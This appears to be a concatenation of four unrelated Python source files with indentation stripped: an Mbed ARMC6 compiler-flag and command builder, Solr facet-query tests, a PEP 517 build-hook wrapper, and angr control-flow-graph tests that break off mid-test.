# (DOMAIN_NS is passed to compiler and assembler via CORTEX_SYMBOLS
# in mbedToolchain.get_symbols)
define_string = self.make_ld_define("DOMAIN_NS", "0x1")
self.flags["ld"].append(define_string)
core = target.core_without_NS
cpu = {
"Cortex-M0+": "cortex-m0plus",
"Cortex-M4F": "cortex-m4",
"Cortex-M7F": "cortex-m7",
"Cortex-M7FD": "cortex-m7",
"Cortex-M33": "cortex-m33+nodsp",
"Cortex-M33F": "cortex-m33+nodsp",
"Cortex-M33E": "cortex-m33",
"Cortex-M33FE": "cortex-m33"}.get(core, core)
cpu = cpu.lower()
self.flags['common'].append("-mcpu=%s" % cpu)
self.SHEBANG += " -mcpu=%s" % cpu
# FPU handling
if core in ["Cortex-M4", "Cortex-M7", "Cortex-M33", "Cortex-M33E"]:
self.flags['common'].append("-mfpu=none")
elif core == "Cortex-M4F":
self.flags['common'].append("-mfpu=fpv4-sp-d16")
self.flags['common'].append("-mfloat-abi=hard")
elif core == "Cortex-M7F" or core.startswith("Cortex-M33F"):
self.flags['common'].append("-mfpu=fpv5-sp-d16")
self.flags['common'].append("-mfloat-abi=hard")
elif core == "Cortex-M7FD":
self.flags['common'].append("-mfpu=fpv5-d16")
self.flags['common'].append("-mfloat-abi=hard")
asm_ld_cpu = {
"Cortex-M0+": "Cortex-M0plus",
"Cortex-M4": "Cortex-M4.no_fp",
"Cortex-M4F": "Cortex-M4",
"Cortex-M7": "Cortex-M7.no_fp",
"Cortex-M7F": "Cortex-M7.fp.sp",
"Cortex-M7FD": "Cortex-M7",
"Cortex-M33": "Cortex-M33.no_dsp.no_fp",
"Cortex-M33E": "Cortex-M33.no_fp",
"Cortex-M33F": "Cortex-M33.no_dsp",
"Cortex-M33FE": "Cortex-M33"}.get(core, core)
self.flags['asm'].append("--cpu=%s" % asm_ld_cpu)
self.flags['ld'].append("--cpu=%s" % asm_ld_cpu)
self.cc = ([join(TOOLCHAIN_PATHS["ARMC6"], "armclang")] +
self.flags['common'] + self.flags['c'])
self.cppc = ([join(TOOLCHAIN_PATHS["ARMC6"], "armclang")] +
self.flags['common'] + self.flags['cxx'])
self.asm = [join(TOOLCHAIN_PATHS["ARMC6"], "armasm")]
self.asm += self.flags['asm']
self.ld = [join(TOOLCHAIN_PATHS["ARMC6"], "armlink")]
self.ld += self.flags['ld']
self.ar = join(TOOLCHAIN_PATHS["ARMC6"], "armar")
self.elf2bin = join(TOOLCHAIN_PATHS["ARMC6"], "fromelf")
# Adding this for safety since this inherits the `version_check`
# function but does not call the constructor of ARM_STD, so the
# `product_name` variable is not initialized.
self.product_name = None
def _get_toolchain_labels(self):
if getattr(self.target, "default_toolchain", "ARM") == "uARM":
return ["ARM", "ARM_MICRO", "ARMC6"]
else:
return ["ARM", "ARM_STD", "ARMC6"]
@property
def is_mbed_studio_armc6(self):
return self.product_name and "Mbed Studio" in self.product_name
def parse_dependencies(self, dep_path):
return mbedToolchain.parse_dependencies(self, dep_path)
def is_not_supported_error(self, output):
return "#error [NOT_SUPPORTED]" in output
def parse_output(self, output):
for line in output.splitlines():
match = self.LD_DIAGNOSTIC_PATTERN.match(line)
if match is not None:
self.notify.cc_info({
'severity': match.group('severity').lower(),
'message': match.group('message'),
'text': '',
'target_name': self.target.name,
'toolchain_name': self.name,
'col': 0,
'file': "",
'line': 0
})
match = self.DIAGNOSTIC_PATTERN.search(line)
if match is not None:
self.notify.cc_info({
'severity': match.group('severity').lower(),
'file': match.group('file'),
'line': match.group('line'),
'col': match.group('col'),
'message': match.group('message'),
'text': '',
'target_name': self.target.name,
'toolchain_name': self.name
})
def get_config_option(self, config_header):
return ["-include", config_header]
def get_compile_options(self, defines, includes, for_asm=False):
opts = ['-D%s' % d for d in defines]
if self.RESPONSE_FILES:
opts += ['@{}'.format(self.get_inc_file(includes))]
else:
opts += ["-I%s" % i for i in includes if i]
config_header = self.get_config_header()
if config_header:
opts.extend(self.get_config_option(config_header))
if for_asm:
opts = [
"--cpreproc",
"--cpreproc_opts=%s" % ",".join(self.flags['common'] + opts)
]
if self.is_mbed_studio_armc6:
# NOTE: the --ide=mbed argument is only for use with Mbed OS
opts.insert(0, "--ide=mbed")
return opts
def assemble(self, source, object, includes):
# Preprocess first, then assemble
root, _ = splitext(object)
tempfile = root + '.E'
# Build preprocess assemble command
cmd_pre = copy(self.cc)
cmd_pre.extend(self.get_compile_options(
self.get_symbols(True), includes, for_asm=False))
cmd_pre.extend(["-E", "-MT", object, "-o", tempfile, source])
# Build main assemble command
cmd = self.asm + ["-o", object, tempfile]
if self.is_mbed_studio_armc6:
# NOTE: the --ide=mbed argument is only for use with Mbed OS
cmd.insert(1, "--ide=mbed")
# Return command array, don't execute
return [cmd_pre, cmd]
def compile(self, cc, source, object, includes):
cmd = copy(cc)
cmd.extend(self.get_compile_options(self.get_symbols(), includes))
cmd.extend(["-o", object, source])
return [cmd]
def get_link_command(
self,
output,
objects,
libraries,
lib_dirs,
scatter_file
):
cmd = ARM.get_link_command(
self, output, objects, libraries, lib_dirs, scatter_file
)
if self.is_mbed_studio_armc6:
# NOTE: the --ide=mbed argument is only for use with Mbed OS
cmd.insert(1, "--ide=mbed")
return cmd
def get_binary_commands(self, bin_arg, bin, elf):
cmd = ARM.get_binary_commands(self, bin_arg, bin, elf)
if self.is_mbed_studio_armc6:
# NOTE: the --ide=mbed argument is only for use with Mbed OS
cmd.insert(1, "--ide=mbed")
return cmd
|
|
# vim: set fileencoding=utf-8 :
#
# Copyright (c) 2012 Retresco GmbH
# Copyright (c) 2011 Daniel Truemper <truemped at googlemail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
from pyvows import Vows, expect
from dopplr.solr.query.facets import FacetFieldQuery
from dopplr.solr.query.facets import FacetQueryQuery
from dopplr.solr.query.facets import MultiselectFacetQuery
from dopplr.solr.query.facets import RangeFacetQuery
@Vows.batch
class FacettingQueries(Vows.Context):
class WithASimpleFacet(Vows.Context):
def topic(self):
q = FacetFieldQuery('foo')
return q.get_params()
def facetTrueMustBePresent(self, topic):
expect(topic).to_include(('facet', 'true'))
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.field', 'foo'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(2)
class WithAMinCountParameter(WithASimpleFacet):
def topic(self):
q = FacetFieldQuery('foo', mincount=1)
return q.get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
def FacetMincountMustBeCorrect(self, topic):
expect(topic).to_include(('f.foo.facet.mincount', '1'))
class WithAFacetValue(WithASimpleFacet):
def topic(self):
q = FacetFieldQuery('foo', value='bar')
return q.get_params()
def theFilterQueryMustBeCreated(self, topic):
expect(topic).to_include(('fq', '{!tag=foo}foo:bar'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
class WithAFacetValueAndWithoutATag(WithASimpleFacet):
def topic(self):
q = FacetFieldQuery('foo', value='bar', tag=False)
return q.get_params()
def theFilterQueryMustBeCreated(self, topic):
expect(topic).to_include(('fq', 'foo:bar'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
class WithASortParameter(WithAFacetValue):
def topic(self):
q = FacetFieldQuery('foo', value='bar', sort='count')
return q.get_params()
def theFacetsShouldBeSortedByCount(self, topic):
expect(topic).to_include(('f.foo.facet.sort', 'count'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(4)
class WithMissingParams(WithAFacetValue):
def topic(self):
q = FacetFieldQuery('foo', value='bar', sort='count', missing=1)
return q.get_params()
def theFacetsShouldBeSortedByCount(self, topic):
expect(topic).to_include(('f.foo.facet.missing', '1'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(5)
@Vows.batch
class MultiSelectFacettingQueries(Vows.Context):
class WithASimpleFacet(Vows.Context):
def topic(self):
q = MultiselectFacetQuery('foo')
return q.get_params()
def facetTrueMustBePresent(self, topic):
expect(topic).to_include(('facet', 'true'))
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.field', 'foo'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(2)
class WithAMinCountParameter(WithASimpleFacet):
def topic(self):
q = MultiselectFacetQuery('foo', mincount=1)
return q.get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
def FacetMincountMustBeCorrect(self, topic):
expect(topic).to_include(('f.foo.facet.mincount', '1'))
class WithAFacetValue(WithASimpleFacet):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar')
return q.get_params()
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.field', '{!ex=foo}foo'))
def theFilterQueryMustBeCreated(self, topic):
expect(topic).to_include(('fq', '{!tag=foo}foo:bar'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
class WithAFacetValueAndWithoutATag(WithAFacetValue):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar', tag=False)
return q.get_params()
def theFilterQueryMustBeCreated(self, topic):
expect(topic).Not.to_include(('fq', 'foo:bar'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(3)
class WithASortParameter(WithAFacetValue):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar', sort='count')
return q.get_params()
def theFacetsShouldBeSortedByCount(self, topic):
expect(topic).to_include(('f.foo.facet.sort', 'count'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(4)
class WithMissingParams(WithAFacetValue):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar', sort='count',
missing=1)
return q.get_params()
def theFacetsShouldBeSortedByCount(self, topic):
expect(topic).to_include(('f.foo.facet.missing', '1'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(5)
class WithAdditionalExcludes(WithAFacetValue):
def topic(self):
q = MultiselectFacetQuery('foo', value='bar',
additional_excludes=['test'])
return q.get_params()
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.field', '{!ex=test,foo}foo'))
@Vows.batch
class ARangeFacetQuery(Vows.Context):
class WithRequiredParams(Vows.Context):
def topic(self):
return RangeFacetQuery('foo', 1, 2, 10).get_params()
def facetTrueMustBePresent(self, topic):
expect(topic).to_include(('facet', 'true'))
def facetFieldMustBeCorrect(self, topic):
expect(topic).to_include(('facet.range', 'foo'))
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(5)
def theStartParameterEquals(self, topic):
expect(topic).to_include(('f.foo.facet.range.start', '1'))
def theGapParameterEquals(self, topic):
expect(topic).to_include(('f.foo.facet.range.gap', '2'))
def theEndParameterEquals(self, topic):
expect(topic).to_include(('f.foo.facet.range.end', '10'))
class WithAValue(WithRequiredParams):
def topic(self):
return RangeFacetQuery('foo', 1, 2, 10, value=5).get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(6)
def theFqMustEqual(self, topic):
expect(topic).to_include(('fq', '{!tag=foo}foo:5'))
class WithAValueAndWithoutATag(WithAValue):
def topic(self):
q = RangeFacetQuery('foo', 1, 2, 10, value=5, tag=False)
return q.get_params()
def theFqMustEqual(self, topic):
expect(topic).to_include(('fq', 'foo:5'))
class WithAHardenedParam(WithRequiredParams):
def topic(self):
return RangeFacetQuery('foo', 1, 2, 10, hardened=True).get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(6)
def theHardenedParamMatches(self, topic):
expect(topic).to_include(('f.foo.facet.range.hardened', True))
class WithAOtherParameter(WithRequiredParams):
def topic(self):
return RangeFacetQuery('foo', 1, 2, 10, other='after').get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(6)
def theOtherParamMatches(self, topic):
expect(topic).to_include(('f.foo.facet.range.other', 'after'))
class WithAnIncludeParameter(WithRequiredParams):
def topic(self):
q = RangeFacetQuery('foo', 1, 2, 10, include='all')
return q.get_params()
def theNumberOfParamsMatches(self, topic):
expect(topic).to_length(6)
def theOtherParamMatches(self, topic):
expect(topic).to_include(('f.foo.facet.range.include', 'all'))
@Vows.batch
class AFacetQueryQuery(Vows.Context):
class WithRequiredParams(Vows.Context):
def topic(self):
return FacetQueryQuery('title:Test').get_params()
def facetTrueMustBePresent(self, topic):
expect(topic).to_include(('facet', 'true'))
def facetQueryMustBeCorrect(self, topic):
expect(topic).to_include(('facet.query', 'title:Test'))
class WithExcludedFilterQueries(WithRequiredParams):
def topic(self):
q = FacetQueryQuery('title:Test', excludeFqs=['test', 'tag'])
return q.get_params()
def facetQueryMustBeCorrect(self, topic):
expect(topic).to_include(('facet.query',
'{!ex=test,tag}title:Test'))
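# Illustrative note (not part of the original test module): for a
# MultiselectFacetQuery('foo', value='bar') the parameters exercised above
# combine into a Solr request roughly like
#   facet=true&facet.field={!ex=foo}foo&fq={!tag=foo}foo:bar
# where the fq is tagged so that the matching facet.field can exclude it.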
|
|
import threading
from contextlib import contextmanager
import os
from os.path import abspath, join as pjoin
import shutil
from subprocess import check_call, check_output, STDOUT
import sys
from tempfile import mkdtemp
from . import compat
from .in_process import _in_proc_script_path
__all__ = [
'BackendUnavailable',
'BackendInvalid',
'HookMissing',
'UnsupportedOperation',
'default_subprocess_runner',
'quiet_subprocess_runner',
'Pep517HookCaller',
]
@contextmanager
def tempdir():
td = mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
class BackendUnavailable(Exception):
"""Will be raised if the backend cannot be imported in the hook process."""
def __init__(self, traceback):
self.traceback = traceback
class BackendInvalid(Exception):
"""Will be raised if the backend is invalid."""
def __init__(self, backend_name, backend_path, message):
self.backend_name = backend_name
self.backend_path = backend_path
self.message = message
class HookMissing(Exception):
"""Will be raised on missing hooks."""
def __init__(self, hook_name):
super(HookMissing, self).__init__(hook_name)
self.hook_name = hook_name
class UnsupportedOperation(Exception):
"""May be raised by build_sdist if the backend indicates that it can't."""
def __init__(self, traceback):
self.traceback = traceback
def default_subprocess_runner(cmd, cwd=None, extra_environ=None):
"""The default method of calling the wrapper subprocess."""
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
check_call(cmd, cwd=cwd, env=env)
def quiet_subprocess_runner(cmd, cwd=None, extra_environ=None):
"""A method of calling the wrapper subprocess while suppressing output."""
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
check_output(cmd, cwd=cwd, env=env, stderr=STDOUT)
def norm_and_check(source_tree, requested):
"""Normalise and check a backend path.
Ensure that the requested backend path is specified as a relative path,
and resolves to a location under the given source tree.
Return an absolute version of the requested path.
"""
if os.path.isabs(requested):
raise ValueError("paths must be relative")
abs_source = os.path.abspath(source_tree)
abs_requested = os.path.normpath(os.path.join(abs_source, requested))
# We have to use commonprefix for Python 2.7 compatibility. So we
# normalise case to avoid problems because commonprefix is a character
# based comparison :-(
norm_source = os.path.normcase(abs_source)
norm_requested = os.path.normcase(abs_requested)
if os.path.commonprefix([norm_source, norm_requested]) != norm_source:
raise ValueError("paths must be inside source tree")
return abs_requested
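# Illustrative example (not part of the original module): with a source
# tree of "/work/project", norm_and_check("/work/project", "backend")
# returns "/work/project/backend", while
# norm_and_check("/work/project", "../elsewhere") raises ValueError
# because the resolved path escapes the source tree.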
class Pep517HookCaller(object):
"""A wrapper around a source directory to be built with a PEP 517 backend.
:param source_dir: The path to the source directory, containing
pyproject.toml.
:param build_backend: The build backend spec, as per PEP 517, from
pyproject.toml.
:param backend_path: The backend path, as per PEP 517, from pyproject.toml.
:param runner: A callable that invokes the wrapper subprocess.
:param python_executable: The Python executable used to invoke the backend
The 'runner', if provided, must expect the following:
- cmd: a list of strings representing the command and arguments to
execute, as would be passed to e.g. 'subprocess.check_call'.
- cwd: a string representing the working directory that must be
used for the subprocess. Corresponds to the provided source_dir.
- extra_environ: a dict mapping environment variable names to values
which must be set for the subprocess execution.
"""
def __init__(
self,
source_dir,
build_backend,
backend_path=None,
runner=None,
python_executable=None,
):
if runner is None:
runner = default_subprocess_runner
self.source_dir = abspath(source_dir)
self.build_backend = build_backend
if backend_path:
backend_path = [
norm_and_check(self.source_dir, p) for p in backend_path
]
self.backend_path = backend_path
self._subprocess_runner = runner
if not python_executable:
python_executable = sys.executable
self.python_executable = python_executable
@contextmanager
def subprocess_runner(self, runner):
"""A context manager for temporarily overriding the default subprocess
runner.
"""
prev = self._subprocess_runner
self._subprocess_runner = runner
try:
yield
finally:
self._subprocess_runner = prev
def _supported_features(self):
"""Return the list of optional features supported by the backend."""
return self._call_hook('_supported_features', {})
def get_requires_for_build_wheel(self, config_settings=None):
"""Identify packages required for building a wheel
Returns a list of dependency specifications, e.g.::
["wheel >= 0.25", "setuptools"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_wheel', {
'config_settings': config_settings
})
def prepare_metadata_for_build_wheel(
self, metadata_directory, config_settings=None,
_allow_fallback=True):
"""Prepare a ``*.dist-info`` folder with metadata for this project.
Returns the name of the newly created folder.
If the build backend defines a hook with this name, it will be called
in a subprocess. If not, the backend will be asked to build a wheel,
and the dist-info extracted from that (unless _allow_fallback is
False).
"""
return self._call_hook('prepare_metadata_for_build_wheel', {
'metadata_directory': abspath(metadata_directory),
'config_settings': config_settings,
'_allow_fallback': _allow_fallback,
})
def build_wheel(
self, wheel_directory, config_settings=None,
metadata_directory=None):
"""Build a wheel from this project.
Returns the name of the newly created file.
In general, this will call the 'build_wheel' hook in the backend.
However, if that was previously called by
'prepare_metadata_for_build_wheel', and the same metadata_directory is
used, the previously built wheel will be copied to wheel_directory.
"""
if metadata_directory is not None:
metadata_directory = abspath(metadata_directory)
return self._call_hook('build_wheel', {
'wheel_directory': abspath(wheel_directory),
'config_settings': config_settings,
'metadata_directory': metadata_directory,
})
def get_requires_for_build_editable(self, config_settings=None):
"""Identify packages required for building an editable wheel
Returns a list of dependency specifications, e.g.::
["wheel >= 0.25", "setuptools"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_editable', {
'config_settings': config_settings
})
def prepare_metadata_for_build_editable(
self, metadata_directory, config_settings=None,
_allow_fallback=True):
"""Prepare a ``*.dist-info`` folder with metadata for this project.
Returns the name of the newly created folder.
If the build backend defines a hook with this name, it will be called
in a subprocess. If not, the backend will be asked to build an editable
wheel, and the dist-info extracted from that (unless _allow_fallback is
False).
"""
return self._call_hook('prepare_metadata_for_build_editable', {
'metadata_directory': abspath(metadata_directory),
'config_settings': config_settings,
'_allow_fallback': _allow_fallback,
})
def build_editable(
self, wheel_directory, config_settings=None,
metadata_directory=None):
"""Build an editable wheel from this project.
Returns the name of the newly created file.
In general, this will call the 'build_editable' hook in the backend.
However, if that was previously called by
'prepare_metadata_for_build_editable', and the same metadata_directory
is used, the previously built wheel will be copied to wheel_directory.
"""
if metadata_directory is not None:
metadata_directory = abspath(metadata_directory)
return self._call_hook('build_editable', {
'wheel_directory': abspath(wheel_directory),
'config_settings': config_settings,
'metadata_directory': metadata_directory,
})
def get_requires_for_build_sdist(self, config_settings=None):
"""Identify packages required for building a wheel
Returns a list of dependency specifications, e.g.::
["setuptools >= 26"]
This does not include requirements specified in pyproject.toml.
It returns the result of calling the equivalently named hook in a
subprocess.
"""
return self._call_hook('get_requires_for_build_sdist', {
'config_settings': config_settings
})
def build_sdist(self, sdist_directory, config_settings=None):
"""Build an sdist from this project.
Returns the name of the newly created file.
This calls the 'build_sdist' backend hook in a subprocess.
"""
return self._call_hook('build_sdist', {
'sdist_directory': abspath(sdist_directory),
'config_settings': config_settings,
})
def _call_hook(self, hook_name, kwargs):
# On Python 2, pytoml returns Unicode values (which is correct) but the
# environment passed to check_call needs to contain string values. We
# convert here by encoding using ASCII (the backend can only contain
# letters, digits and _, . and : characters, and will be used as a
# Python identifier, so non-ASCII content is wrong on Python 2 in
# any case).
# For backend_path, we use sys.getfilesystemencoding.
if sys.version_info[0] == 2:
build_backend = self.build_backend.encode('ASCII')
else:
build_backend = self.build_backend
extra_environ = {'PEP517_BUILD_BACKEND': build_backend}
if self.backend_path:
backend_path = os.pathsep.join(self.backend_path)
if sys.version_info[0] == 2:
backend_path = backend_path.encode(sys.getfilesystemencoding())
extra_environ['PEP517_BACKEND_PATH'] = backend_path
with tempdir() as td:
hook_input = {'kwargs': kwargs}
compat.write_json(hook_input, pjoin(td, 'input.json'),
indent=2)
# Run the hook in a subprocess
with _in_proc_script_path() as script:
python = self.python_executable
self._subprocess_runner(
[python, abspath(str(script)), hook_name, td],
cwd=self.source_dir,
extra_environ=extra_environ
)
data = compat.read_json(pjoin(td, 'output.json'))
if data.get('unsupported'):
raise UnsupportedOperation(data.get('traceback', ''))
if data.get('no_backend'):
raise BackendUnavailable(data.get('traceback', ''))
if data.get('backend_invalid'):
raise BackendInvalid(
backend_name=self.build_backend,
backend_path=self.backend_path,
message=data.get('backend_error', '')
)
if data.get('hook_missing'):
raise HookMissing(data.get('missing_hook_name') or hook_name)
return data['return_val']
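# Illustrative usage sketch (not part of the original module); the paths,
# backend name and output directory below are made up:
#
#   hooks = Pep517HookCaller(
#       '/path/to/project',         # directory containing pyproject.toml
#       'setuptools.build_meta',    # build-backend from pyproject.toml
#   )
#   with hooks.subprocess_runner(quiet_subprocess_runner):
#       reqs = hooks.get_requires_for_build_wheel()
#       wheel_name = hooks.build_wheel('/path/to/dist')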
class LoggerWrapper(threading.Thread):
"""
Read messages from a pipe and redirect them
to a logger (see python's logging module).
"""
def __init__(self, logger, level):
threading.Thread.__init__(self)
self.daemon = True
self.logger = logger
self.level = level
# create the pipe and reader
self.fd_read, self.fd_write = os.pipe()
self.reader = os.fdopen(self.fd_read)
self.start()
def fileno(self):
return self.fd_write
@staticmethod
def remove_newline(msg):
return msg[:-1] if msg.endswith(os.linesep) else msg
def run(self):
for line in self.reader:
self._write(self.remove_newline(line))
def _write(self, message):
self.logger.log(self.level, message)
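# Illustrative sketch (not part of the original module): LoggerWrapper can
# be handed to a subprocess as a writable file descriptor so that its
# output is forwarded line by line to a logger. Names below are examples.
#
#   import logging, subprocess
#   wrapper = LoggerWrapper(logging.getLogger('pep517.subprocess'), logging.INFO)
#   subprocess.check_call(['echo', 'hello'], stdout=wrapper.fileno())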
|
|
import nose
import angr
import time
import pickle
import networkx
import simuvex
import logging
l = logging.getLogger("angr.tests.test_cfg")
import os
test_location = str(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../binaries/tests'))
def compare_cfg(standard, g, function_list):
"""
Standard graph comes with addresses only, and it is based on instructions, not on basic blocks
"""
def get_function_name(addr):
start = 0
end = len(function_list) - 1
while start <= end:
mid = (start + end) // 2
f = function_list[mid]
if addr < f['start']:
end = mid - 1
elif addr > f['end']:
start = mid + 1
else:
return f['name']
return None
# Sort function list
function_list = sorted(function_list, key=lambda x: x['start'])
# Convert the IDA-style CFG into VEX-style CFG
s_graph = networkx.DiGraph()
all_nodes = sorted(standard.nodes())
addr_to_basicblock = {}
last_basicblock = None
for n in all_nodes:
if last_basicblock is None:
last_basicblock = (n, n)
block = last_basicblock
successors = standard.successors(n)
if len(successors) == 1 and successors[0] >= block[0]:
last_basicblock = (block[0], successors[0])
else:
# Save the existing block
addr_to_basicblock[block[0]] = block
# Create edges
for s in successors:
s_graph.add_edge(block[0], s)
# Clear last_basicblock so that we create a new basicblock next time
last_basicblock = None
graph = networkx.DiGraph()
for src, dst in g.edges():
graph.add_edge(src.addr, dst.addr)
# Graph comparison
for src, dst in s_graph.edges():
if graph.has_edge(src, dst):
continue
else:
# Edge doesn't exist in our CFG
l.error("Edge (%s-0x%x, %s-0x%x) only exists in IDA CFG.", get_function_name(src), src, get_function_name(dst), dst)
for src, dst in graph.edges():
if s_graph.has_edge(src, dst):
continue
else:
# Edge doesn't exist in our CFG
l.error("Edge (%s-0x%x, %s-0x%x) only exists in angr's CFG.", get_function_name(src), src, get_function_name(dst), dst)
def perform_single(binary_path, cfg_path=None):
proj = angr.Project(binary_path,
use_sim_procedures=True,
default_analysis_mode='symbolic',
load_options={'auto_load_libs': False})
start = time.time()
cfg = proj.analyses.CFG(context_sensitivity_level=1)
end = time.time()
duration = end - start
bbl_dict = cfg.get_bbl_dict()
l.info("CFG generated in %f seconds.", duration)
l.info("Contains %d members in BBL dict.", len(bbl_dict))
if cfg_path is not None and os.path.isfile(cfg_path):
# Compare the graph with a predefined CFG
info = pickle.load(open(cfg_path, "rb"))
standard = info['cfg']
functions = info['functions']
graph = cfg.graph
compare_cfg(standard, graph, functions)
else:
l.warning("No standard CFG specified.")
def test_cfg_0():
binary_path = test_location + "/x86_64/cfg_0"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_cfg_1():
binary_path = test_location + "/x86_64/cfg_1"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_cfg_2():
binary_path = test_location + "/armel/test_division"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_cfg_3():
binary_path = test_location + "/mips/test_arrays"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def disabled_cfg_4():
binary_path = test_location + "/mipsel/darpa_ping"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_additional_edges():
# Test the `additional_edges` parameter for CFG generation
binary_path = test_location + "/x86_64/switch"
proj = angr.Project(binary_path,
use_sim_procedures=True,
default_analysis_mode='symbolic',
load_options={'auto_load_libs': False})
additional_edges = {
0x400573 : [ 0x400580, 0x40058f, 0x40059e ]
}
cfg = proj.analyses.CFG(context_sensitivity_level=0, additional_edges=additional_edges)
nose.tools.assert_not_equal(cfg.get_any_node(0x400580), None)
nose.tools.assert_not_equal(cfg.get_any_node(0x40058f), None)
nose.tools.assert_not_equal(cfg.get_any_node(0x40059e), None)
nose.tools.assert_equal(cfg.get_any_node(0x4005ad), None)
def test_not_returning():
# Make sure we are properly labeling functions that do not return in function manager
binary_path = test_location + "/x86_64/not_returning"
proj = angr.Project(binary_path,
use_sim_procedures=True,
load_options={'auto_load_libs': False}
)
proj.analyses.CFG(context_sensitivity_level=0)
# function_a returns
nose.tools.assert_not_equal(proj.kb.functions.function(name='function_a'), None)
nose.tools.assert_true(proj.kb.functions.function(name='function_a').returning)
# function_b does not return
nose.tools.assert_not_equal(proj.kb.functions.function(name='function_b'), None)
nose.tools.assert_false(proj.kb.functions.function(name='function_b').returning)
# function_c does not return
nose.tools.assert_not_equal(proj.kb.functions.function(name='function_c'), None)
nose.tools.assert_false(proj.kb.functions.function(name='function_c').returning)
# main does not return
nose.tools.assert_not_equal(proj.kb.functions.function(name='main'), None)
nose.tools.assert_false(proj.kb.functions.function(name='main').returning)
# function_d should not be reachable
nose.tools.assert_equal(proj.kb.functions.function(name='function_d'), None)
def disabled_cfg_5():
binary_path = test_location + "/mipsel/busybox"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def test_cfg_6():
# We need to add DO_CCALLS to resolve long jmp and support real mode
simuvex.o.modes['fastpath'] |= {simuvex.s_options.DO_CCALLS}
binary_path = test_location + "/i386/bios.bin.elf"
proj = angr.Project(binary_path,
use_sim_procedures=True,
load_options={'auto_load_libs': False})
proj.analyses.CFG(context_sensitivity_level=1)
nose.tools.assert_greater_equal(len(proj.kb.functions), 58)
simuvex.o.modes['fastpath'] ^= {simuvex.s_options.DO_CCALLS}
def test_fauxware():
binary_path = test_location + "/x86_64/fauxware"
cfg_path = binary_path + ".cfg"
perform_single(binary_path, cfg_path)
def disabled_loop_unrolling():
binary_path = test_location + "/x86_64/cfg_loop_unrolling"
p = angr.Project(binary_path)
cfg = p.analyses.CFG()
cfg.normalize()
cfg.unroll_loops(5)
nose.tools.assert_equal(len(cfg.get_all_nodes(0x400636)), 7)
def test_thumb_mode():
# In Thumb mode, all instruction addresses and addresses in the function manager should be odd numbers,
# which faithfully reflects VEX's trick of encoding the THUMB state in the address.
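# For example, a Thumb basic block that starts at 0x10400 shows up in the
# CFG and in the function manager at 0x10401 (the address with bit 0 set).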
binary_path = test_location + "/armhf/test_arrays"
p = angr.Project(binary_path)
cfg = p.analyses.CFG()
def check_addr(a):
if a % 2 == 1:
nose.tools.assert_true(cfg.is_thumb_addr(a))
else:
nose.tools.assert_false(cfg.is_thumb_addr(a))
# CFGNodes
cfg_node_addrs = [ n.addr for n in cfg.graph.nodes() ]
for a in cfg_node_addrs:
check_addr(a)
# Functions in function manager
for f_addr, f in p.kb.functions.items():
check_addr(f_addr)
if f.startpoint is not None:
check_addr(f.startpoint.addr)
def test_fakeret_edges_0():
# Test the bug where a fakeret edge can be missing in certain cases
# Reported by Attila Axt (GitHub: @axt)
# Ref: https://github.com/angr/angr/issues/72
binary_path = os.path.join(test_location, "x86_64", "cfg_3")
p = angr.Project(binary_path)
cfg = p.analyses.CFGAccurate(context_sensitivity_level=3)
putchar = cfg.functions.function(name="putchar")
# Since context sensitivity is 3, there should be two different putchar nodes
putchar_cfgnodes = cfg.get_all_nodes(putchar.addr)
nose.tools.assert_equal(len(putchar_cfgnodes), 2)
# Each putchar node has a different predecessor as their PLT entry
plt_entry_0 = cfg.get_predecessors(putchar_cfgnodes[0])
nose.tools.assert_equal(len(plt_entry_0), 1)
plt_entry_0 = plt_entry_0[0]
plt_entry_1 = cfg.get_predecessors(putchar_cfgnodes[1])
nose.tools.assert_equal(len(plt_entry_1), 1)
plt_entry_1 = plt_entry_1[0]
nose.tools.assert_true(plt_entry_0 is not plt_entry_1)
# Each PLT entry should have a FakeRet edge
preds_0 = cfg.get_predecessors(plt_entry_0)
nose.tools.assert_equal(len(preds_0), 1)
